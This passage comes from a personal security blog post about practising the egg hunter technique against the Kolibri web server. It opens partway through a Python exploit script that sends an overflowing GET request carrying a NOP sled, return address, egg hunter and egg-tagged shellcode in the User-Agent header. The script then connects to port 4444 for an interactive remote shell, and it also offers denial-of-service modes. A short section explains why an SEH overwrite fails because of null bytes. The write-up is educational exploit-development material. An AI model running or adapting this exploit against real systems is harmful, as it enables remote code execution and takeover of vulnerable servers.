class="hljs-keyword">for</span> attempt <span class="hljs-keyword">in</span> <span class="hljs-built_in">range</span>(<span class="hljs-number">10</span>): <span class="hljs-comment"># retry</span><br>        <span class="hljs-keyword">try</span>:<br>            time.sleep(<span class="hljs-number">1</span>)<br>            shell_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)<br>            shell_sock.settimeout(<span class="hljs-number">3</span>)<br>            shell_sock.connect((ip, <span class="hljs-number">4444</span>))<br>            shell_sock.settimeout(<span class="hljs-literal">None</span>)<br>            <span class="hljs-built_in">print</span>(<span class="hljs-string">f&quot;\n[+] Pwned!\n&quot;</span>)<br>            <span class="hljs-keyword">break</span><br>        <span class="hljs-keyword">except</span> (socket.error, socket.timeout):<br>            <span class="hljs-keyword">if</span> shell_sock:<br>                shell_sock.close()<br>            shell_sock = <span class="hljs-literal">None</span><br>            sys.stdout.write(<span class="hljs-string">&quot;.&quot;</span>)<br>            sys.stdout.flush()<br><br>    <span class="hljs-keyword">if</span> <span class="hljs-keyword">not</span> shell_sock:<br>        <span class="hljs-built_in">print</span>(<span class="hljs-string">&quot;[-] Connection failed: Max retries reached.&quot;</span>)<br>        sys.exit(<span class="hljs-number">1</span>)<br><br>    <span class="hljs-built_in">print</span>(<span class="hljs-string">&quot;[+] Interactive shell spawned below:\n&quot;</span>)<br><br>    <span class="hljs-keyword">while</span> <span class="hljs-literal">True</span>:<br>        read_list = [sys.stdin, shell_sock]<br>        read_sockets, _, _ = select.select(read_list, [], [])<br><br>        <span class="hljs-keyword">if</span> sys.stdin <span class="hljs-keyword">in</span> read_sockets:<br>            line = sys.stdin.readline()<br>            <span class="hljs-keyword">if</span> <span class="hljs-keyword">not</span> line:<br>                <span class="hljs-keyword">break</span><br>            shell_sock.sendall(line.encode())<br><br>        <span class="hljs-keyword">if</span> shell_sock <span class="hljs-keyword">in</span> read_sockets:<br>            data = shell_sock.recv(<span class="hljs-number">1024</span>)<br>            <span class="hljs-keyword">if</span> <span class="hljs-keyword">not</span> data:<br>                <span class="hljs-built_in">print</span>(<span class="hljs-string">&quot;\n[-] Connection closed by target.&quot;</span>)<br>                <span class="hljs-keyword">break</span><br>            sys.stdout.write(data.decode(errors=<span class="hljs-string">&#x27;ignore&#x27;</span>))<br>            sys.stdout.flush()<br><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">do_exploit</span>(<span class="hljs-params">url: <span class="hljs-built_in">str</span></span>):<br>    parsed = urlparse(url)<br>    host = parsed.hostname<br>    port = parsed.port <span class="hljs-keyword">or</span> <span class="hljs-number">80</span><br><br>    payload_path = <span class="hljs-string">b&#x27;/&#x27;</span> + <span class="hljs-string">b&#x27;\x90&#x27;</span> * OFFSET + RET + hunter<br><br>    egg_payload = (EGG_TAG * <span class="hljs-number">2</span> + egg_code).decode(<span class="hljs-string">&#x27;latin1&#x27;</span>)<br><br>    http_request = (<br>        <span class="hljs-string">f&#x27;GET <span class="hljs-subst">&#123;payload_path.decode(<span class="hljs-string">&quot;latin1&quot;</span>)&#125;</span> HTTP/1.1\r\n&#x27;</span><br>        <span class="hljs-string">f&#x27;Host: <span class="hljs-subst">&#123;host&#125;</span>:<span class="hljs-subst">&#123;port&#125;</span>\r\n&#x27;</span><br>        <span class="hljs-string">f&#x27;User-Agent: <span class="hljs-subst">&#123;egg_payload&#125;</span>\r\n\r\n&#x27;</span><br>    ).encode(<span class="hljs-string">&#x27;latin1&#x27;</span>)<br><br>    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)<br>    <br>    <span class="hljs-keyword">try</span>:<br>        sock.connect((host, port))<br>        sock.sendall(http_request)<br>        resp = sock.recv(<span class="hljs-number">4096</span>)<br>        <span class="hljs-built_in">print</span>(resp.decode(<span class="hljs-string">&#x27;latin1&#x27;</span>, errors=<span class="hljs-string">&#x27;ignore&#x27;</span>))<br><br>        do_connect(host)<br><br>    <span class="hljs-keyword">except</span> Exception <span class="hljs-keyword">as</span> ex:<br>        <span class="hljs-built_in">print</span>(ex)<br>    <span class="hljs-keyword">finally</span>:<br>        sock.close()<br><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">main</span>():<br>    <span class="hljs-keyword">if</span> <span class="hljs-keyword">not</span> args.url:<br>        parser.print_help()<br>        <span class="hljs-keyword">return</span><br><br>    url = args.url<br><br>    <span class="hljs-keyword">if</span> args.dos:<br>        do_dos(url)<br>    <span class="hljs-keyword">elif</span> args.deadbeef:<br>        do_deadbeef(url)<br>    <span class="hljs-keyword">elif</span> args.exploit:<br>        do_exploit(url)<br>    <span class="hljs-keyword">else</span>:<br>        args.print_help()<br><br><span class="hljs-keyword">if</span> __name__ == <span class="hljs-string">&#x27;__main__&#x27;</span>:<br>    main()<br></code></pre></td></tr></table></figure>
<p align="center" class='item-img' data-src='/images/article/2026-9-13-Kolibri-EggHunter/7.png'><img src="/images/article/2026-9-13-Kolibri-EggHunter/7.png" width=800/>
</p>

<h1 id="Using-SEH-Overflow"><a href="#Using-SEH-Overflow" class="headerlink" title="Using SEH Overflow?"></a>Using SEH Overflow?</h1><p>While developing the exploit script, I found that we can overwrite the <code>SEH</code> value if the junk data is large enough:</p>
<p align="center" class='item-img' data-src='/images/article/2026-9-13-Kolibri-EggHunter/1.png'><img src="/images/article/2026-9-13-Kolibri-EggHunter/1.png" width=600/>
</p>

<p>So, does it imply that we can perform an <strong>SEH overwrite</strong> as well? It seems like a viable method. In my experiment, however, we cannot.</p>
<p>The reason is that we cannot find an address containing a <code>pop # pop # ret</code> sequence without a null byte (<code>\x00</code>).</p>
<p align="center" class='item-img' data-src='/images/article/2026-9-13-Kolibri-EggHunter/8.png'><img src="/images/article/2026-9-13-Kolibri-EggHunter/8.png" width=800/>
</p>

<p align="center" class='item-img' data-src='/images/article/2026-9-13-Kolibri-EggHunter/9.png'><img src="/images/article/2026-9-13-Kolibri-EggHunter/9.png" width=800/>
</p>

<p>If the address is located at the end of the payload, then it would be fine. However, the null byte (<code>\x00</code>) terminates the HTTP request:</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs python">http_request = (<br>    <span class="hljs-string">f&#x27;GET <span class="hljs-subst">&#123;payload_path.decode(<span class="hljs-string">&quot;latin1&quot;</span>)&#125;</span> HTTP/1.1\r\n&#x27;</span><br>    <span class="hljs-string">f&#x27;Host: <span class="hljs-subst">&#123;host&#125;</span>:<span class="hljs-subst">&#123;port&#125;</span>\r\n\r\n&#x27;</span><br>).encode(<span class="hljs-string">&#x27;latin1&#x27;</span>)<br></code></pre></td></tr></table></figure>
<p>As a result, the HTTP server cannot process the HTTP request properly and therefore returns an HTTP response with a status code of <code>400 Bad Request</code>.</p>
<h1 id="Conclusion"><a href="#Conclusion" class="headerlink" title="Conclusion"></a>Conclusion</h1><p>This article is a practice of the egg hunter technique. Therefore, the content might be shorter than the previous articles in this series…</p>
<p>On the other hand, it also shows how easy exploitation can become once we have mastered a technique! I only spent a short amount of time exploiting the application!</p>
<p>In the next article, I will explore <strong>Unicode overflow</strong>, then <strong>MS08-067</strong> and finally, <strong>bypassing different modern protections!</strong></p>
<p>This is the end of the article. If you have any comments or suggestions, please feel free to leave them below!</p>
<h1 id="THANKS-FOR-READING"><a href="#THANKS-FOR-READING" class="headerlink" title="THANKS FOR READING!"></a>THANKS FOR READING!</h1><p>I drew a <a target="_blank" rel="noopener" href="https://www.pixiv.net/artworks/149621828">new drawing</a>!</p>
<p align="center" class='item-img' data-src='/images/meme/Wallpaper/MyArt/4.png'><img src="/images/meme/Wallpaper/MyArt/4.png" width=700/>
    <figcaption>
    Keep going!
    </figcaption>
</p>
<div id="paginator"></div></div><div id="post-footer"><div id="pages" style="justify-content: flex-end"><div class="footer-link" style="width: 50%;right:1px;border-left:1px #fe2 solid"><a href="/2026/09/12/2026-9-12-EggHunter/">[Learning] Egg Hunter — From Scratch to Exploit Prev →</a></div></div></div><div id="comments"><div class="selector"><button class="utterances-sel"></button></div><div id="utterances-container"></div></div></div><div class="bottom-btn"><div><a id="to-top" onClick="scrolls.scrolltop();" title="To Top" style="opacity: 0; display: none;">∧</a><a id="to-index" href="#toc-div" title="To Catalog">≡</a><a id="color-mode" onClick="colorMode.change()" title="Change Theme"></a></div></div></article><aside><div id="about"><a target="_blank" rel="noopener" href="https://github.com/iss4cf0ng/" width="200" id="logo"><img src="https://avatars.githubusercontent.com/u/110074064?v=4" alt="Logo"></a><h1 id="Dr"><a href="/">ISSAC</a></h1><div id="description"><p>Everything is failing...</p></div><div id="social-links"><a class="social" target="_blank" rel="noopener" href="https://github.com/iss4cf0ng/"><i class="fab fa-github" alt="GitHub"></i></a><a class="social" target="_blank" rel="noopener" href="https://x.com/iss4c_f0ng/"><i class="fab fa-twitter" alt="X"></i></a></div><div id="rss-feed"><a class="social" id="rss-copy-button" href="javascript:void(0)" title="Copy RSS link to clipboard"><span>RSS</span></a></div></div><div id="music"></div><div class="music-box"><hr style="border:1px solid #ccc; margin:10px 0"><p class="music-title">Feeling exhausted? Let's enjoy (やさしい) music!</p><p style="text-align:center; position: relative"><img class="music-anime" id="anime-img" src="/images/meme/himari_coffee.2.jpg" width="150" height="200"></p><div style="text-align:center"><button class="music-btn" id="music-prev">⏮</button><button class="music-btn" id="music-toggle">▶ Play Music</button><button class="music-btn" id="music-next">⏭</button></div><div style="margin-top:5px"><span id="music-index"></span></div><hr style="border:1px solid #ccc; margin:10px 0"><audio id="bg-music"><source src="/mp3/music/music_1.mp3" type="audio/mpeg"></audio><script>document.addEventListener("DOMContentLoaded", function () {
  var playlist = [
    "/mp3/music/music_1.mp3",
    "/mp3/music/sugar_story.mp3",
    "/mp3/music/story_music_box.mp3",
    "/mp3/music/last_page.mp3",
    "/mp3/music/sunset_memory.mp3",
    "/mp3/music/welcome_home.mp3",
    "/mp3/music/canon.mp3",
    "/mp3/music/arigadou.mp3",
  ];

  var current = 0;
  const audio = document.getElementById("bg-music");
  const btn = document.getElementById("music-toggle");
  const prevBtn = document.getElementById("music-prev");
  const nextBtn = document.getElementById("music-next");
  const indexDisplay = document.getElementById("music-index");

  function updateDisplay() {
    indexDisplay.innerText = `Currently: ${current + 1} / ${playlist.length}`;
  }

  updateDisplay();

  btn.addEventListener("click", function () {
    if (audio.paused) {
      audio.src = playlist[current];
      audio.play();
      btn.innerText = "⏸ Pause Music";
    } else {
      audio.pause();
      btn.innerText = "▶ Play Music";
    }
  });

  nextBtn.addEventListener("click", function () {
    const wasPlaying = !audio.paused;

    current = (current + 1) % playlist.length;

    audio.src = playlist[current];
    audio.load();

    if (wasPlaying) {
      audio.play();
    }

    updateDisplay();
  });

  prevBtn.addEventListener("click", function () {
    const wasPlaying = !audio.paused;

    current--;

    if (current < 0)
      current = playlist.length - 1;

    audio.src = playlist[current];
    audio.load();

    if (wasPlaying) {
      audio.play();
    }

    updateDisplay();
  });

  audio.addEventListener("ended", function() {
    current = (current + 1) % playlist.length;
    audio.src = playlist[current];
    audio.play();
    updateDisplay();
  });
});
</script><script>document.addEventListener("DOMContentLoaded", function () {
  const animeImg = document.getElementById("anime-img");

  animeImg.addEventListener("click", function() {
    
    const tip = document.createElement("div");
    tip.innerText = "?";
    tip.style.position = "absolute";
    tip.style.top = "-50px";
    tip.style.left = "50%";
    tip.style.transform = "translateX(-50%)";
    tip.style.backgroundColor = "#fff";
    tip.style.color = "rgb(16, 174, 11)";
    tip.style.padding = "2px 6px";
    tip.style.border = "1px solid #ccc";
    tip.style.borderRadius = "8px";
    tip.style.boxShadow = "0 3px 6px rgba(0,0,0,0.2)";
    tip.style.fontSize = "50px";
    tip.style.fontWeight = "bold";
    tip.style.zIndex = "1000";
    tip.style.opacity = "1";
    tip.style.transition = "opacity 1s, top 1s";
    
    animeImg.parentElement.appendChild(tip);

    setTimeout(() => {
      tip.style.opacity = "0";
      tip.style.top = "-60px";
      setTimeout(() => tip.remove(), 1000);
    }, 2000);
  });
});
</script><script>document.addEventListener("DOMContentLoaded", function () {
  const rssBtn = document.getElementById("rss-copy-button");

  rssBtn.addEventListener("click", async () => {
    const rssUrl = window.location.origin + "/atom.xml";
    try {
      await navigator.clipboard.writeText(rssUrl);

      const tip = document.createElement("div");
      tip.innerText = "RSS link copied!";
      tip.style.position = "absolute";
      tip.style.top = "-30px";
      tip.style.left = "50%";
      tip.style.transform = "translateX(-50%)";
      tip.style.backgroundColor = "#0d0d0d";
      tip.style.color = "#00fff7";
      tip.style.border = "1px solid #ff00ff";
      tip.style.boxShadow = "0 0 8px #ff00ff, 0 0 16px #00fff7";
      tip.style.padding = "2px 6px";
      tip.style.borderRadius = "8px";
      tip.style.fontSize = "14px";
      tip.style.fontWeight = "bold";
      tip.style.zIndex = "1000";
      tip.style.opacity = "1";
      tip.style.transition = "opacity 1s, top 1s";

      rssBtn.style.position = "relative";
      rssBtn.appendChild(tip);

      setTimeout(() => {
        tip.style.opacity = "0";
        tip.style.top = "-40px";
        setTimeout(() => tip.remove(), 1000);
      }, 2000);

    } catch (err) {
      console.error("Failed to copy: ", err);
    }
  });
});
</script></div><div id="aside-block"><div id="toc-div"><h1>Catalog</h1><ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#Introduction"><span class="toc-number">1.</span> <span class="toc-text">Introduction</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#Cause-of-the-Vulnerability"><span class="toc-number">2.</span> <span class="toc-text">Cause of the Vulnerability</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#Buffer-Overflow"><span class="toc-number">3.</span> <span class="toc-text">Buffer Overflow</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#Using-SEH-Overflow"><span class="toc-number">4.</span> <span class="toc-text">Using SEH Overflow?</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#Conclusion"><span class="toc-number">5.</span> <span class="toc-text">Conclusion</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#THANKS-FOR-READING"><span class="toc-number">6.</span> <span class="toc-text">THANKS FOR READING!</span></a></li></ol></div></div><footer><nobr>Published with <a target="_blank" rel="noopener" href="http://hexo.io">Hexo</a></nobr></footer></aside></main><canvas id="canvas-dust"></canvas><script src="/js/search.js"></script><script src="/js/custom.js"></script><script src="/js/arknights.js"></script><script src="//unpkg.com/lightgallery@2.7.1/lightgallery.min.js"></script><script src="//unpkg.com/lightgallery@2.7.1/plugins/zoom/lg-zoom.min.js"></script><script src="//unpkg.com/lightgallery@2.7.1/plugins/thumbnail/lg-thumbnail.min.js"></script><script src="/js/pjax.js"></script><script class="pjax-js">reset= () => {code.findCode();
document.querySelector('.lg-container')?.remove()
lightGallery(document.getElementById('post-bg'), {
  plugins: [lgZoom,lgThumbnail],
  selector: '.item-img'})}</script><script>window.addEventListener("load",() => {pjax = new Pjax({
 cacheBust: false,
 selectors: ['title','article','#aside-block','.pjax-js'],
 switches: {'article': Pjax.switches.sideBySide},
 switchesOptions: {
   'article': {
     classNames: {
       remove: "pjax-out",
       add: "pjax-in"
     }
   }
 }
});
document.addEventListener("pjax:complete", reset);reset()})</script><script src="/js/slide.js"></script></body></html>